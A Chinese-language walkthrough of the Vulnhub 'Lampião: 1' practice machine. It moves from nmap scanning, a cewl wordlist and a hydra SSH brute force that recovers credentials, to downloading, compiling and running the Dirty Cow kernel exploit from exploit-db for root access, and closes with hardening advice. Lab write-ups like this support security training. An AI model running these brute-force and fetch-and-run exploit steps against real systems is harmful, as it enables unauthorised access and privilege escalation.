Vulnhub-Lampião: 1 渗透测试通关教学指南<\/h1>

靶机概述<\/h2>

名称<\/strong>: Lampião: 1<\/li>
难度<\/strong>: 简单(Easy)<\/li>
目标<\/strong>: 获取root权限并找到flag<\/li>

背景<\/strong>: 以巴西著名土匪领袖Lampião为名的渗透测试靶机<\/li> <\/ul>
信息收集阶段<\/h2>
网络扫描<\/h3>

确定靶机IP<\/strong>:<\/p>
netdiscover <\/span><\/span><\/code><\/pre><\/li> 全面端口扫描<\/strong>:<\/p> nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.11.131 <\/span><\/span><\/code><\/pre> -n<\/code>: 禁用DNS解析<\/li> -v<\/code>: 详细输出<\/li> -Pn<\/code>: 跳过主机发现<\/li> -p-<\/code>: 扫描所有端口(1-65535)<\/li> -A<\/code>: 启用操作系统检测和版本检测<\/li> --reason<\/code>: 显示端口状态原因<\/li> -oN<\/code>: 输出到文件<\/li> <\/ul> <\/li> 扫描结果分析<\/strong>:<\/p> 22端口: SSH服务<\/li> 80端口: HTTP服务(仅显示字符画)<\/li> 1898端口: Drupal CMS<\/li> <\/ul> <\/li> <\/ol> 漏洞利用阶段<\/h2> 80端口分析<\/h3> 仅显示字符画，包含"fi duma egud?"字样<\/li> 无其他有用信息<\/li> <\/ul> 1898端口(Drupal)利用<\/h3> 初始尝试<\/strong>:<\/p> 尝试使用Drupal 7.x PHP filter模块getshell<\/li> 发现注册功能不可用(激活邮件无法发送)<\/li> <\/ul> <\/li> 替代方案<\/strong>:<\/p> 使用cewl工具生成字典<\/li> <\/ul> cewl -w dict.txt http:\/\/192.168.11.131:1898\/?q=<\/span>node\/1 <\/span><\/span><\/code><\/pre> 发现两个潜在用户名: tiago和eder<\/li> <\/ul> <\/li> SSH爆破<\/strong>:<\/p> hydra -L usernames.txt -P dict.txt -t 4<\/span> ssh:\/\/192.168.11.131 <\/span><\/span><\/code><\/pre> -L<\/code>: 指定用户名列表<\/li> -P<\/code>: 指定密码字典<\/li> -t<\/code>: 线程数<\/li> 成功获取凭证: tiago:virgulino<\/li> <\/ul> <\/li> <\/ol> 权限提升<\/h3> 系统信息收集<\/strong>:<\/p> uname -a <\/span><\/span>lsb_release -a <\/span><\/span><\/code><\/pre> 内核版本: 4.4.0-31-generic<\/li> 系统版本: Ubuntu 14.04.5 LTS (Trusty)<\/li> <\/ul> <\/li> 漏洞检测<\/strong>:<\/p> wget -q -O \/tmp\/linux-exploit-suggester.sh https:\/\/raw.githubusercontent.com\/mzet-\/linux-exploit-suggester\/master\/linux-exploit-suggester.sh <\/span><\/span>chmod +x \/tmp\/linux-exploit-suggester.sh <\/span><\/span>\/tmp\/linux-exploit-suggester.sh <\/span><\/span><\/code><\/pre> 发现Dirty Cow(CVE-2016-5195)漏洞可用<\/li> <\/ul> <\/li> 利用Dirty Cow提权<\/strong>:<\/p> wget -q -O \/tmp\/40847.cpp https:\/\/www.exploit-db.com\/download\/40847.cpp <\/span><\/span>g++ -Wall -pedantic -O2 -std=<\/span>c++11 -pthread -o dcow 40847.cpp -lutil <\/span><\/span>.\/dcow -s <\/span><\/span><\/code><\/pre> 成功获取root权限<\/li> <\/ul> <\/li> <\/ol> 获取Flag<\/h2> 查找flag<\/strong>:<\/p> cat \/root\/flag.txt <\/span><\/span><\/code><\/pre> 显示: 9740616875908d91ddcdaa8aea3af366<\/li> <\/ul> <\/li> 验证flag<\/strong>:<\/p> md5sum \/var\/www\/html\/lampiao.jpg <\/span><\/span><\/code><\/pre> 确认flag为图片的MD5值<\/li> 图片内容为Lampião的肖像<\/li> <\/ul> <\/li> <\/ol> 工具与技术总结<\/h2> 信息收集工具<\/strong>:<\/p> netdiscover: 发现网络主机<\/li> nmap: 全面端口扫描<\/li> <\/ul> <\/li> 密码爆破工具<\/strong>:<\/p> cewl: 从网页生成字典<\/li> hydra: SSH爆破<\/li> <\/ul> <\/li> 权限提升技术<\/strong>:<\/p> 内核漏洞利用(Dirty Cow)<\/li> linux-exploit-suggester: 自动检测可用漏洞<\/li> <\/ul> <\/li> 关键技巧<\/strong>:<\/p> 全面端口扫描的重要性(-p-参数)<\/li> 从网页内容生成字典<\/li> 系统信息收集与漏洞匹配<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 系统层面<\/strong>:<\/p> 及时更新内核和安全补丁<\/li> 禁用不必要的服务<\/li> <\/ul> <\/li> Drupal安全<\/strong>:<\/p> 保持CMS更新<\/li> 限制用户注册功能<\/li> <\/ul> <\/li> SSH安全<\/strong>:<\/p> 禁用密码认证，使用密钥认证<\/li> 限制登录尝试次数<\/li> 使用强密码策略<\/li> <\/ul> <\/li> 权限管理<\/strong>:<\/p> 遵循最小权限原则<\/li> 定期审计用户权限<\/li> <\/ul> <\/li> <\/ol> 通过本案例，我们学习了从信息收集到权限提升的完整渗透测试流程，特别是针对老旧系统的内核漏洞利用技术。<\/p>